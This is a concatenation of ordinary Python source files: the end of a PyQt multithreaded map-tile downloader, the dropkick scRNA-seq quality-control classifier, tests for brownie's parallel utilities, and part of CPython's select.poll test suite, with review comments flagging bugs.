                e.accept()
                self.tmpFilePath = path
            else:
                e.ignore()
        else:
            e.ignore()

    def dropEvent(self, e):
        # Commit the path validated in dragEnterEvent, reset the table, and
        # load the job JSON. Output dir = <job dir>/<job basename>.
        self.CurrentFilePath = self.tmpFilePath
        # self.file_path = abstract_file_path(e.mimeData().urls()[0].path())
        self.list_clear()
        filename = os.path.split(self.CurrentFilePath)
        filename = os.path.splitext(filename[-1])[0]
        self.CurrentDir = os.path.join(os.path.dirname(self.CurrentFilePath), filename)
        print(self.CurrentDir)
        with open(self.CurrentFilePath) as f:
            self.rawData = json.load(f)
            print(self.rawData['URL'])
            self.list_insert_data(self.rawData['CODES'])

    def clicked(self, qModelIndex):
        print(qModelIndex.row())

    def clicked_bt_download(self, e):
        """Start the download: spawn 32 workers sharing one item generator."""
        # url = "http://t0.tiles.ditu.live.com/tiles/r132122221.png?g=102&mkt=zh-cn&n=z"
        # print(download(url, 'test.png', r'C:\Users\W-Mai\Desktop\MAP'))
        if self.CurrentFilePath == "":
            return
        g = self.ItemGenerator()
        self.TotalItem = self.model.rowCount()
        self.CurrentFinished = 0
        self.psSig.connect(self.ProcessRefresh)
        # Polling refresh thread superseded by the psSig signal above.
        # threading.Thread(target=self.ProcessRefreshThread).start()
        for index in range(32):
            threading.Thread(target=self.DownloadTread, args=(g,), name=str(index)).start()

    def list_insert_data(self, data: Dict[AnyStr, List[AnyStr]]):
        # Populate the table with one row per code key, status column "...".
        # NOTE(review): keys with int(key) < 10 are skipped — confirm whether
        # this filter is intentional or leftover debugging.
        model = self.model
        for key, val in data.items():
            if int(key) < 10:
                continue
            model.appendRow(QStandardItem(f"{key}"))
            model.setItem(model.rowCount() - 1, 1, QStandardItem("..."))

    def list_clear(self):
        model = self.model
        model.removeRows(0, model.rowCount())

    def ProcessRefresh(self):
        """Slot: push current completion ratio into the progress bar."""
        # with mutex_ps:
        #     print(int(self.CurrentFinished / self.TotalItem * 100))
        self.psProcess.setValue(int(self.CurrentFinished / self.TotalItem * 100))

    def ItemGenerator(self):
        """Yield [row_index, key, url, pos] work items for every table row.

        URLs are prefix + key + suffix from the job's URL section; pos is the
        per-key value from CODES (used as two output subdirectories).
        """
        model: QStandardItemModel = self.model
        prefix = self.rawData["URL"]['prefix']
        suffix = self.rawData["URL"]['suffix']
        num = model.rowCount()
        yield_list = []
        for index in range(num):
            key = model.data(model.index(index, 0), Qt.ItemDataRole.DisplayRole)
            url = prefix + key + suffix
            yield_list.append([index, key, url, self.rawData["CODES"][key]])
        for item in yield_list:
            yield item

    def ProcessRefreshThread(self):
        # Legacy polling refresher (currently not started).
        # NOTE(review): busy loop with no sleep and no exit condition — would
        # peg a CPU core if re-enabled.
        while True:
            try:
                self.ProcessRefresh()
            except Exception as e:
                print(e)

    def DownloadTread(self, g):
        """Worker loop: pull items from the shared generator until exhausted.

        The generator is not thread-safe on its own, so next() runs under
        `mutex`. Each result updates the item's STATUS cell and emits psSig.
        NOTE(review): `CurrentFinished += 1` is not atomic across threads and
        model.setItem is called from worker threads — both are candidates for
        marshalling through signals.
        """
        while True:
            try:
                with mutex:
                    index, key, url, pos = next(g)
            except StopIteration:
                break
            model = self.model
            with mutex:
                print(index, key, pos, threading.current_thread().name)
            # sleep(0.3)
            res = download(url, f"{key}.png", os.path.join(self.CurrentDir, pos[0], pos[1]))
            if res['code'] == 0:
                model.setItem(index, 1, QStandardItem("√"))
            else:
                model.setItem(index, 1, QStandardItem(res['msg']))
            self.CurrentFinished += 1
            self.psSig.emit()


if __name__ == '__main__':
    # When frozen by PyInstaller, resources live in the _MEIPASS temp dir.
    if getattr(sys, 'frozen', None):
        basedir = sys._MEIPASS
    else:
        basedir = os.path.dirname(__file__)
    dirname = basedir
    # Point Qt at the bundled platform plugins next to the executable.
    plugin_path = os.path.join(dirname, 'platforms')
    os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = plugin_path
    print(plugin_path)
    QApplication.setStyle('Fusion')
    app = QApplication(sys.argv)
    ex = MainWindow()
    sys.exit(app.exec())
dropkick.py
# -*- coding: utf-8 -*-
"""
Automated QC classifier pipeline

@author: C Heiser
"""
import argparse
import sys
import os, errno
import numpy as np
import matplotlib.pyplot as plt
import scanpy as sc
import time
import threading
from skimage.filters import threshold_li, threshold_otsu, threshold_mean

from logistic import LogitNet


class Spinner:
    """Context manager that animates a spinning cursor on stdout while the
    wrapped block runs (used to show progress during model fitting)."""
    busy = False
    delay = 0.1

    @staticmethod
    def spinning_cursor():
        # Endless |/-\ cycle.
        while 1:
            for cursor in "|/-\\":
                yield cursor

    def __init__(self, delay=None):
        self.spinner_generator = self.spinning_cursor()
        if delay and float(delay):
            self.delay = delay

    def spinner_task(self):
        # Draw one frame, wait, erase it; loops until busy is cleared.
        while self.busy:
            sys.stdout.write(next(self.spinner_generator))
            sys.stdout.flush()
            time.sleep(self.delay)
            sys.stdout.write("\b")
            sys.stdout.flush()

    def __enter__(self):
        self.busy = True
        threading.Thread(target=self.spinner_task).start()

    def __exit__(self, exception, value, tb):
        self.busy = False
        time.sleep(self.delay)  # let the spinner thread notice and exit
        if exception is not None:
            return False


def check_dir_exists(path):
    """
    Checks if directory already exists or not and creates it if it doesn't
    """
    try:
        os.makedirs(path)
    except OSError as exception:
        # EEXIST is fine (already there); re-raise anything else.
        if exception.errno != errno.EEXIST:
            raise


def recipe_dropkick(
    adata,
    X_final="raw_counts",
    filter=True,
    calc_metrics=True,
    mito_names="^mt-|^MT-",
    n_ambient=10,
    target_sum=None,
    n_hvgs=2000,
    verbose=True,
):
    """
    scanpy preprocessing recipe

    Parameters:
        adata (AnnData.AnnData): object with raw counts data in .X
        X_final (str): which normalization should be left in .X slot?
            ("raw_counts","arcsinh_norm","norm_counts")
        filter (bool): remove cells and genes with zero total counts
        calc_metrics (bool): if False, do not calculate metrics in .obs/.var
        mito_names (str): substring encompassing mitochondrial gene names for
            calculation of mito expression
        n_ambient (int): number of ambient genes to call. top genes by cells.
        target_sum (int): total sum of counts for each cell prior to arcsinh
            and log1p transformations; default None to use median counts.
        n_hvgs (int or None): number of HVGs to calculate using Seurat method
            if None, do not calculate HVGs
        verbose (bool): print updates to the console?

    Returns:
        AnnData.AnnData: adata is edited in place to include:
        - useful .obs and .var columns
            ("total_counts", "pct_counts_mito", "n_genes_by_counts", etc.)
        - raw counts (adata.layers["raw_counts"])
        - normalized counts (adata.layers["norm_counts"])
        - arcsinh transformation of normalized counts (adata.X)
        - highly variable genes if desired (adata.var["highly_variable"])
    """
    if filter:
        # remove cells and genes with zero total counts
        orig_shape = adata.shape
        sc.pp.filter_cells(adata, min_genes=10)
        sc.pp.filter_genes(adata, min_counts=1)
        if adata.shape[0] != orig_shape[0]:
            print(
                "Ignoring {} cells with zero total counts".format(
                    orig_shape[0] - adata.shape[0]
                )
            )
        if adata.shape[1] != orig_shape[1]:
            print(
                "Ignoring {} genes with zero total counts".format(
                    orig_shape[1] - adata.shape[1]
                )
            )

    # store raw counts before manipulation
    adata.layers["raw_counts"] = adata.X.copy()

    if calc_metrics:
        if verbose:
            print("Calculating metrics:")
        # identify mitochondrial genes
        adata.var["mito"] = adata.var_names.str.contains(mito_names)
        # identify putative ambient genes by lowest dropout pct (top 10)
        adata.var["ambient"] = np.array(
            adata.X.astype(bool).sum(axis=0) / adata.n_obs
        ).squeeze()
        if verbose:
            print(
                "Top {} ambient genes have dropout rates between {} and {} percent:\n\t{}".format(
                    n_ambient,
                    round((1 - adata.var.ambient.nlargest(n=n_ambient).max()) * 100, 2),
                    round((1 - adata.var.ambient.nlargest(n=n_ambient).min()) * 100, 2),
                    adata.var.ambient.nlargest(n=n_ambient).index.tolist(),
                )
            )
        adata.var["ambient"] = (
            adata.var.ambient >= adata.var.ambient.nlargest(n=n_ambient).min()
        )
        # calculate standard qc .obs and .var
        sc.pp.calculate_qc_metrics(
            adata, qc_vars=["mito", "ambient"], inplace=True, percent_top=[10, 50, 100]
        )
        # other arcsinh-transformed metrics
        adata.obs["arcsinh_total_counts"] = np.arcsinh(adata.obs["total_counts"])
        adata.obs["arcsinh_n_genes_by_counts"] = np.arcsinh(
            adata.obs["n_genes_by_counts"]
        )

    # log1p transform (adata.layers["log1p_norm"])
    sc.pp.normalize_total(adata, target_sum=target_sum, layers=None, layer_norm=None)
    adata.layers["norm_counts"] = adata.X.copy()  # save to .layers
    sc.pp.log1p(adata)
    adata.layers["log1p_norm"] = adata.X.copy()  # save to .layers

    # HVGs
    if n_hvgs is not None:
        if verbose:
            print("Determining {} highly variable genes".format(n_hvgs))
        sc.pp.highly_variable_genes(
            adata, n_top_genes=n_hvgs, n_bins=20, flavor="seurat"
        )

    # arcsinh-transform normalized counts to leave in .X
    adata.X = np.arcsinh(adata.layers["norm_counts"])
    sc.pp.scale(adata)  # scale genes for feeding into model
    adata.layers[
        "arcsinh_norm"
    ] = adata.X.copy()  # save arcsinh scaled counts in .layers

    # set .X as desired for downstream processing; default raw_counts
    adata.X = adata.layers[X_final].copy()


def auto_thresh_obs(
    adata,
    obs_cols=["arcsinh_n_genes_by_counts", "pct_counts_ambient"],
    method="otsu",
):
    """
    automated thresholding on metrics in adata.obs

    Parameters:
        adata (anndata.AnnData): object containing unfiltered scRNA-seq data
        obs_cols (list of str): name of column(s) to threshold from adata.obs
        method (str): one of 'otsu' (default), 'li', or 'mean'

    Returns:
        thresholds (dict): keys are obs_cols and values are threshold results
    """
    thresholds = dict.fromkeys(obs_cols)  # initiate output dictionary
    for col in obs_cols:
        tmp = np.array(adata.obs[col])
        if method == "otsu":
            thresholds[col] = threshold_otsu(tmp)
        elif method == "li":
            thresholds[col] = threshold_li(tmp)
        elif method == "mean":
            thresholds[col] = threshold_mean(tmp)
        else:
            raise ValueError(
                "Please provide a valid threshold method ('otsu', 'li', 'mean')."
            )
    return thresholds


def plot_thresh_obs(adata, thresholds, bins=40, show=True):
    """
    plot automated thresholding on metrics in adata.obs as output by auto_thresh_obs()

    Parameters:
        adata (anndata.AnnData): object containing unfiltered scRNA-seq data
        thresholds (dict): output of auto_thresh_obs() function
        bins (int): number of bins for histogram
        show (bool): show plot or return object

    Returns:
        plot of distributions of obs_cols in thresholds dictionary with
        corresponding threshold values
    """
    # NOTE: assumes len(thresholds) >= 2 so plt.subplots returns an array of axes.
    fig, axes = plt.subplots(
        ncols=len(thresholds), nrows=1, figsize=(len(thresholds) * 4, 4), sharey=True
    )
    axes[0].set_ylabel("cells")
    for i in range(len(thresholds)):
        axes[i].hist(adata.obs[list(thresholds.keys())[i]], bins=bins)
        axes[i].axvline(list(thresholds.values())[i], color="r")
        axes[i].set_title(list(thresholds.keys())[i])
    fig.tight_layout()
    if show:
        plt.show()
    else:
        return fig


def filter_thresh_obs(
    adata,
    thresholds,
    obs_cols=["arcsinh_n_genes_by_counts", "pct_counts_ambient"],
    directions=["above", "below"],
    inclusive=True,
    name="thresh_filter",
):
    """
    filter cells by thresholding on metrics in adata.obs as output by auto_thresh_obs()

    Parameters:
        adata (anndata.AnnData): object containing unfiltered scRNA-seq data
        thresholds (dict): output of auto_thresh_obs() function
        obs_cols (list of str): name of column(s) to threshold from adata.obs
        directions (list of str): 'below' or 'above', indicating which
            direction to keep (label=1)
        inclusive (bool): include cells at the thresholds? default True.
        name (str): name of .obs col containing final labels

    Returns:
        updated adata with filter labels in adata.obs[name]
    """
    # initialize .obs column as all "good" cells
    adata.obs[name] = 1
    # if any criteria are NOT met, label cells "bad"
    for i in range(len(obs_cols)):
        if directions[i] == "above":
            if inclusive:
                adata.obs.loc[
                    (adata.obs[name] == 1)
                    & (adata.obs[obs_cols[i]] <= thresholds[obs_cols[i]]),
                    name,
                ] = 0
            else:
                adata.obs.loc[
                    (adata.obs[name] == 1)
                    & (adata.obs[obs_cols[i]] < thresholds[obs_cols[i]]),
                    name,
                ] = 0
        elif directions[i] == "below":
            if inclusive:
                adata.obs.loc[
                    (adata.obs[name] == 1)
                    & (adata.obs[obs_cols[i]] >= thresholds[obs_cols[i]]),
                    name,
                ] = 0
            else:
                adata.obs.loc[
                    (adata.obs[name] == 1)
                    & (adata.obs[obs_cols[i]] > thresholds[obs_cols[i]]),
                    name,
                ] = 0


def dropkick(
    adata,
    mito_names="^mt-|^MT-",
    n_hvgs=2000,
    thresh_method="otsu",
    metrics=["arcsinh_n_genes_by_counts", "pct_counts_ambient",],
    directions=["above", "below"],
    alphas=[0.1],
    n_lambda=10,
    cut_point=1,
    n_splits=5,
    max_iter=100000,
    n_jobs=-1,
    seed=18,
):
    """
    generate logistic regression model of cell quality

    Parameters:
        adata (anndata.AnnData): object containing unfiltered, raw scRNA-seq
            counts in .X layer
        mito_names (str): substring encompassing mitochondrial gene names for
            calculation of mito expression
        n_hvgs (int or None): number of HVGs to calculate using Seurat method
            if None, do not calculate HVGs
        thresh_method (str): one of 'otsu' (default), 'li', or 'mean'
        metrics (list of str): name of column(s) to threshold from adata.obs
        directions (list of str): 'below' or 'above', indicating which
            direction to keep (label=1)
        alphas (tuple of int): alpha values to test using glmnet with n-fold
            cross validation
        n_lambda (int): number of lambda values to test in glmnet
        cut_point (float): The cut point to use for selecting lambda_best.
            arg_max lambda
            cv_score(lambda)>=cv_score(lambda_max)-cut_point*standard_error(lambda_max)
        n_splits (int): number of splits for n-fold cross validation
        max_iter (int): number of iterations for glmnet optimization
        n_jobs (int): number of threads for cross validation by glmnet
        seed (int): random state for cross validation by glmnet

    Returns:
        adata_thresh (dict): dictionary of automated thresholds on heuristics
        rc (LogisticRegression): trained logistic regression classifier

        updated adata inplace to include 'train', 'dropkick_score', and
        'dropkick_label' columns in .obs
    """
    # 0) preprocess counts and calculate required QC metrics
    a = adata.copy()  # make copy of anndata before manipulating
    recipe_dropkick(
        a,
        X_final="arcsinh_norm",
        filter=True,
        calc_metrics=True,
        mito_names=mito_names,
        n_hvgs=n_hvgs,
        target_sum=None,
        verbose=True,
    )

    # 1) threshold chosen heuristics using automated method
    print("Thresholding on heuristics for training labels:\n\t{}".format(metrics))
    adata_thresh = auto_thresh_obs(a, method=thresh_method, obs_cols=metrics)

    # 2) create labels from combination of thresholds
    filter_thresh_obs(
        a,
        adata_thresh,
        obs_cols=metrics,
        directions=directions,
        inclusive=True,
        name="train",
    )

    X = a.X[:, a.var.highly_variable].copy()  # final X is HVGs
    y = a.obs["train"].copy(deep=True)  # final y is "train" labels from step 2

    if len(alphas) > 1:
        # 3.1) cross-validation to choose alpha and lambda values
        cv_scores = {"rc": [], "lambda": [], "alpha": [], "score": []}  # dictionary o/p
        for alpha in alphas:
            print("Training LogitNet with alpha: {}".format(alpha), end="  ")
            rc = LogitNet(
                alpha=alpha,
                n_lambda=n_lambda,
                cut_point=cut_point,
                n_splits=n_splits,
                max_iter=max_iter,
                n_jobs=n_jobs,
                random_state=seed,
            )
            with Spinner():
                rc.fit(adata=a, y=y, n_hvgs=n_hvgs)
            print("\n", end="")
            cv_scores["rc"].append(rc)
            cv_scores["alpha"].append(alpha)
            cv_scores["lambda"].append(rc.lambda_best_)
            cv_scores["score"].append(rc.score(X, y, lamb=rc.lambda_best_))
        # determine optimal lambda and alpha values by accuracy score
        lambda_ = cv_scores["lambda"][
            cv_scores["score"].index(max(cv_scores["score"]))
        ]  # choose lambda value
        alpha_ = cv_scores["alpha"][
            cv_scores["score"].index(max(cv_scores["score"]))
        ]  # choose alpha (l1 ratio)
        rc_ = cv_scores["rc"][
            cv_scores["score"].index(max(cv_scores["score"]))
        ]  # choose classifier
        print("Chosen lambda value: {}; Chosen alpha value: {}".format(lambda_, alpha_))
    else:
        # 3.2) train model with single alpha value
        print("Training LogitNet with alpha: {}".format(alphas[0]), end="  ")
        rc_ = LogitNet(
            alpha=alphas[0],
            n_lambda=n_lambda,
            cut_point=cut_point,
            n_splits=n_splits,
            max_iter=max_iter,
            n_jobs=n_jobs,
            random_state=seed,
        )
        with Spinner():
            rc_.fit(adata=a, y=y, n_hvgs=n_hvgs)
        print("\n", end="")
        lambda_, alpha_ = rc_.lambda_best_, alphas[0]

    # 4) use ridge model to assign scores and labels to original adata
    print("Assigning scores and labels")
    adata.obs.loc[a.obs_names, "dropkick_score"] = rc_.predict_proba(X)[:, 1]
    adata.obs.dropkick_score.fillna(0, inplace=True)  # fill ignored cells with zeros
    adata.obs.loc[a.obs_names, "dropkick_label"] = rc_.predict(X)
    adata.obs.dropkick_label.fillna(0, inplace=True)  # fill ignored cells with zeros
    for metric in metrics:
        adata.obs.loc[a.obs_names, metric] = a.obs[metric]
        adata.obs[metric].fillna(0, inplace=True)  # fill ignored cells with zeros
    adata.var.loc[a.var_names[a.var.highly_variable], "dropkick_coef"] = rc_.coef_.squeeze()

    # 5) save model hyperparameters in .uns
    adata.uns["dropkick_thresholds"] = adata_thresh
    adata.uns["dropkick_args"] = {
        "n_hvgs": n_hvgs,
        "thresh_method": thresh_method,
        "metrics": metrics,
        "directions": directions,
        "alphas": alphas,
        "chosen_alpha": alpha_,
        "chosen_lambda": lambda_,
        "n_lambda": n_lambda,
        "cut_point": cut_point,
        "n_splits": n_splits,
        "max_iter": max_iter,
        "seed": seed,
    }  # save command-line arguments to .uns for reference

    print("Done!\n")
    return rc_


def coef_inventory(adata, n=10):
    """
    return highest and lowest coefficient values from logistic regression
    model, along with sparsity

    Parameters:
        adata (anndata.AnnData): object generated from dropkick.py ("regression")
        n (int): number of genes to show at top and bottom of coefficient list

    Returns:
        prints top and bottom n genes by their coefficient values
    """
    # BUGFIX: boolean Series must be inverted with `~`, not unary `-`
    # (unary minus on a boolean Series raises TypeError in modern pandas).
    print("\nTop HVGs by coefficient value (good cells):")
    print(adata.var.loc[~adata.var.dropkick_coef.isna(), "dropkick_coef"].nlargest(n))
    print("\nBottom HVGs by coefficient value (bad droplets):")
    print(adata.var.loc[~adata.var.dropkick_coef.isna(), "dropkick_coef"].nsmallest(n))
    n_zero = (adata.var.dropkick_coef == 0).sum()
    n_coef = (~adata.var.dropkick_coef.isna()).sum()
    sparsity = round((n_zero / n_coef) * 100, 3)
    print("\n{} coefficients equal to zero. Model sparsity: {} %\n".format(n_zero, sparsity))


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "counts",
        type=str,
        help="Input (cell x gene) counts matrix as .h5ad or tab delimited text file",
    )
    parser.add_argument(
        "--obs-cols",
        type=str,
        help="Heuristics for thresholding. Several can be specified with '--obs-cols arcsinh_n_genes_by_counts pct_counts_ambient'",
        nargs="+",
        default=["arcsinh_n_genes_by_counts", "pct_counts_ambient"],
    )
    parser.add_argument(
        "--directions",
        type=str,
        help="Direction of thresholding for each heuristic. Several can be specified with '--obs-cols above below'",
        nargs="+",
        default=["above", "below"],
    )
    parser.add_argument(
        "--thresh-method",
        type=str,
        help="Method used for automatic thresholding on heuristics. One of ['otsu','li','mean']. Default 'Otsu'",
        default="otsu",
    )
    parser.add_argument(
        "--mito-names",
        type=str,
        help="Substring or regex defining mitochondrial genes. Default '^mt-|^MT-'",
        default="^mt-|^MT-",
    )
    parser.add_argument(
        "--n-hvgs",
        type=int,
        help="Number of highly variable genes for training model. Default 2000",
        default=2000,
    )
    parser.add_argument(
        "--seed",
        type=int,
        help="Random state for cross validation",
        default=18,
    )
    parser.add_argument(
        "--output-dir",
        type=str,
        help="Output directory. Output will be placed in [output-dir]/[name]...",
        nargs="?",
        default=".",
    )
    parser.add_argument(
        "--alphas",
        type=float,
        help="Ratios between l1 and l2 regularization for regression model",
        nargs="*",
        default=[0.1],
    )
    parser.add_argument(
        "--n-lambda",
        type=int,
        help="Number of lambda (regularization strength) values to test. Default 10",
        default=10,
    )
    parser.add_argument(
        "--cut-point",
        type=float,
        help="The cut point to use for selecting lambda_best. Default 1.0",
        default=1.0,
    )
    parser.add_argument(
        "--n-splits",
        type=int,
        help="Number of splits for cross validation. Default 5",
        default=5,
    )
    parser.add_argument(
        "--n-iter",
        type=int,
        help="Maximum number of iterations for optimization. Default 100000",
        default=100000,
    )
    parser.add_argument(
        "--n-jobs",
        type=int,
        help="Maximum number of threads for cross validation. Default -1",
        default=-1,
    )

    args = parser.parse_args()

    # read in counts data
    print("\nReading in unfiltered counts from {}".format(args.counts), end="")
    adata = sc.read(args.counts)
    print(" - {} barcodes and {} genes".format(adata.shape[0], adata.shape[1]))

    # check that output directory exists, create it if needed.
    check_dir_exists(args.output_dir)
    # get basename of file for writing outputs
    name = os.path.splitext(os.path.basename(args.counts))[0]

    regression_model = dropkick(
        adata,
        mito_names=args.mito_names,
        n_hvgs=args.n_hvgs,
        thresh_method=args.thresh_method,
        metrics=args.obs_cols,
        directions=args.directions,
        alphas=args.alphas,
        n_lambda=args.n_lambda,
        cut_point=args.cut_point,
        n_splits=args.n_splits,
        max_iter=args.n_iter,
        n_jobs=args.n_jobs,
        seed=args.seed,
    )

    # generate plot of chosen training thresholds on heuristics
    print(
        "Saving threshold plots to {}/{}_{}_thresholds.png".format(
            args.output_dir, name, args.thresh_method
        )
    )
    thresh_plt = plot_thresh_obs(
        adata, adata.uns["dropkick_thresholds"], bins=40, show=False
    )
    plt.savefig(
        "{}/{}_{}_thresholds.png".format(args.output_dir, name, args.thresh_method)
    )

    # save new labels
    # BUGFIX: previously formatted with args.command, which argparse never
    # defines (AttributeError), and disagreed with the actual output filename.
    print(
        "Writing updated counts to {}/{}_dropkick.h5ad".format(args.output_dir, name)
    )
    adata.write(
        "{}/{}_dropkick.h5ad".format(args.output_dir, name),
        compression="gzip",
    )
parallel.py
# coding: utf-8
"""
    brownie.tests.parallel
    ~~~~~~~~~~~~~~~~~~~~~~

    Tests for :mod:`brownie.parallel`.

    :copyright: 2010-2011 by Daniel Neuhäuser
    :license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from threading import Thread

from attest import Tests, Assert, TestBase, test

from brownie.parallel import get_cpu_count, AsyncResult, TimeoutError


tests = Tests()


@tests.test
def test_get_cpu_count():
    # get_cpu_count() must return a positive, stable value where supported...
    try:
        Assert(get_cpu_count()) > 0
        Assert(get_cpu_count()) == get_cpu_count()
    except NotImplementedError:
        # make sure default is returned if the number of processes cannot be
        # determined
        Assert(get_cpu_count(2)) == 2


class TestAsyncResult(TestBase):
    @test
    def wait(self):
        # wait() must return (without TimeoutError) once another thread calls
        # set(); the setter fires after 1s, we allow 2s.
        aresult = AsyncResult()

        def setter(aresult):
            time.sleep(1)
            aresult.set('foo')
        t = Thread(target=setter, args=(aresult, ))
        t.start()
        with Assert.not_raising(TimeoutError):
            aresult.wait(2)

    @test
    def get(self):
        # get(timeout) raises TimeoutError while no value is set...
        aresult = AsyncResult()
        with Assert.raises(TimeoutError):
            aresult.get(0.1)

        # ...returns the value once set from another thread...
        def setter(aresult):
            time.sleep(1)
            aresult.set('foo')
        t = Thread(target=setter, args=(aresult, ))
        t.start()
        with Assert.not_raising(TimeoutError):
            Assert(aresult.get(2)) == 'foo'

        # ...and get() without a timeout returns an already-set value.
        aresult.set('foo')
        Assert(aresult.get()) == 'foo'

        # success=False stores an exception which get() re-raises.
        aresult = AsyncResult()
        aresult.set(ValueError(), success=False)
        with Assert.raises(ValueError):
            aresult.get()

    @test
    def callback_errback(self):
        # The callback fires on success=True, the errback on success=False;
        # both receive the stored object exactly once.
        testruns = (['callback', True], ['errback', False])
        for kwarg, success in testruns:
            l = []
            callback = lambda obj, l=l: l.append(obj)
            aresult = AsyncResult(**{kwarg: callback})
            assert not aresult.ready
            aresult.set('foo', success=success)
            Assert(len(l)) == 1
            Assert(l[0]) == 'foo'

    @test
    def repr(self):
        # repr() lists only the hooks that were supplied, in a fixed order.
        aresult = AsyncResult()
        Assert(repr(aresult)) == 'AsyncResult()'

        aresult = AsyncResult(callback=1)
        Assert(repr(aresult)) == 'AsyncResult(callback=1)'

        aresult = AsyncResult(errback=1)
        Assert(repr(aresult)) == 'AsyncResult(errback=1)'

        aresult = AsyncResult(callback=1, errback=2)
        Assert(repr(aresult)) == 'AsyncResult(callback=1, errback=2)'


tests.register(TestAsyncResult)
test_poll.py
# Test case for the os.poll() function

import os
import subprocess
import random
import select
import threading
import time
import unittest
from test.support import TESTFN, run_unittest, reap_threads, cpython_only
import sys

# select.poll is optional; skip the whole module where it's absent or broken.
try:
    select.poll
except AttributeError:
    raise unittest.SkipTest("select.poll not defined")

if sys.platform == 'OpenVMS':
    raise unittest.SkipTest("OpenVMS does not support select.poll")


def find_ready_matching(ready, flag):
    """Return the fds from a poll() result list whose event mask includes flag."""
    match = []
    for fd, mode in ready:
        if mode & flag:
            match.append(fd)
    return match


class PollTests(unittest.TestCase):

    def test_poll1(self):
        # Basic functional test of poll object
        # Create a bunch of pipe and test that poll works with them.

        p = select.poll()

        NUM_PIPES = 12
        MSG = b" This is a test."
        MSG_LEN = len(MSG)
        readers = []
        writers = []
        r2w = {}
        w2r = {}

        for i in range(NUM_PIPES):
            rd, wr = os.pipe()
            p.register(rd)
            # Exercise modify() as well as register().
            p.modify(rd, select.POLLIN)
            p.register(wr, select.POLLOUT)
            readers.append(rd)
            writers.append(wr)
            r2w[rd] = wr
            w2r[wr] = rd

        bufs = []

        # Push one message through a random ready pipe per iteration until all
        # pipes have been used and closed.
        while writers:
            ready = p.poll()
            ready_writers = find_ready_matching(ready, select.POLLOUT)
            if not ready_writers:
                raise RuntimeError("no pipes ready for writing")
            wr = random.choice(ready_writers)
            os.write(wr, MSG)

            ready = p.poll()
            ready_readers = find_ready_matching(ready, select.POLLIN)
            if not ready_readers:
                raise RuntimeError("no pipes ready for reading")
            rd = random.choice(ready_readers)
            buf = os.read(rd, MSG_LEN)
            self.assertEqual(len(buf), MSG_LEN)
            bufs.append(buf)
            os.close(r2w[rd]) ; os.close( rd )
            p.unregister( r2w[rd] )
            p.unregister( rd )
            writers.remove(r2w[rd])

        self.assertEqual(bufs, [MSG] * NUM_PIPES)

    def test_poll_unit_tests(self):
        # returns NVAL for invalid file descriptor
        FD, w = os.pipe()
        os.close(FD)
        os.close(w)
        p = select.poll()
        p.register(FD)
        r = p.poll()
        self.assertEqual(r[0], (FD, select.POLLNVAL))

        # Registering a file object uses its fileno(); once the fd is stale
        # (file removed/closed) poll reports POLLNVAL for it.
        with open(TESTFN, 'w') as f:
            fd = f.fileno()
            p = select.poll()
            p.register(f)
            r = p.poll()
            self.assertEqual(r[0][0], fd)
        r = p.poll()
        self.assertEqual(r[0], (fd, select.POLLNVAL))
        os.unlink(TESTFN)

        # type error for invalid arguments
        p = select.poll()
        self.assertRaises(TypeError, p.register, p)
        self.assertRaises(TypeError, p.unregister, p)

        # can't unregister non-existent object
        p = select.poll()
        self.assertRaises(KeyError, p.unregister, 3)

        # Test error cases
        pollster = select.poll()
        class Nope:
            pass

        class Almost:
            # fileno() must return an int; returning a str is a TypeError.
            def fileno(self):
                return 'fileno'

        self.assertRaises(TypeError, pollster.register, Nope(), 0)
        self.assertRaises(TypeError, pollster.register, Almost(), 0)

    # Another test case for poll().  This is copied from the test case for
    # select(), modified to use poll() instead.

    def test_poll2(self):
        cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                bufsize=0)
        # Enter the context manager manually so cleanup runs even on failure.
        proc.__enter__()
        self.addCleanup(proc.__exit__, None, None, None)
        p = proc.stdout
        pollster = select.poll()
        pollster.register( p, select.POLLIN )
        for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
            fdlist = pollster.poll(tout)
            if (fdlist == []):
                continue
            fd, flags = fdlist[0]
            if flags & select.POLLHUP:
                line = p.readline()
                if line != b"":
                    self.fail('error: pipe seems to be closed, but still returns data')
                continue

            elif flags & select.POLLIN:
                line = p.readline()
                if not line:
                    break
                self.assertEqual(line, b'testing...\n')
                continue
            else:
                self.fail('Unexpected return value from select.poll: %s' % fdlist)

    def test_poll3(self):
        # test int overflow
        pollster = select.poll()
        pollster.register(1)

        self.assertRaises(OverflowError, pollster.poll, 1 << 64)

        # NOTE(review): vestigial sanity check — always passes; presumably a
        # leftover from an earlier version of this test.
        x = 2 + 3
        if x != 5:
            self.fail('Overflow must have occurred')

        # Issues #15989, #17919
        self.assertRaises(ValueError, pollster.register, 0, -1)
        self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
        self.assertRaises(ValueError, pollster.modify, 1, -1)
        self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)

    @cpython_only
    def test_poll_c_limits(self):
        # Event masks are C unsigned shorts; timeouts are C ints/unsigned ints.
        from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
        pollster = select.poll()
        pollster.register(1)

        # Issues #15989, #17919
        self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
        self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
        self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
        self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)

    @reap_threads
    def test_threaded_poll(self):
        # Mutating the registered-fd set while another thread is blocked in
        # poll() must raise RuntimeError rather than crash.
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        rfds = []
        for i in range(10):
            fd = os.dup(r)
            self.addCleanup(os.close, fd)
            rfds.append(fd)
        pollster = select.poll()
        for fd in rfds:
            pollster.register(fd, select.POLLIN)

        t = threading.Thread(target=pollster.poll)
        t.start()
        try:
            time.sleep(0.5)
            # trigger ufds array reallocation
            for fd in rfds:
                pollster.unregister(fd)
            pollster.register(w, select.POLLOUT)
            self.assertRaises(RuntimeError, pollster.poll)
        finally:
            # and make the call to poll() from the thread return
            os.write(w, b'spam')
            t.join()

    # NOTE(review): `threading` is a module and is always truthy, so this
    # skipUnless never skips — looks like a leftover from the optional-
